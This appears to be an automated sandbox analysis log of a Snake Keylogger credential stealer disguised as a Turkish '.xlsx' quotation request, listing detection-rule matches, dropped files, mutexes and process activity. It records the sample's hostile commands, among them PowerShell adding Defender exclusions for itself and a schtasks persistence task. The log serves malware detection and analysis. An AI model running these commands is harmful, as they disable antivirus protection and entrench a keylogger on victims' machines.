Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OnCgVRIhY.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, safV0hi54xbxv1r7gV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, safV0hi54xbxv1r7gV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Mutant created: \Sessions\1\BaseNamedObjects\YbFhKycGgIWiKQVsljvxPKhn
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2584:120:WilError_03
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File created: C:\Users\user\AppData\Local\Temp\tmp1B98.tmp Jump to behavior
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.000000000321D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
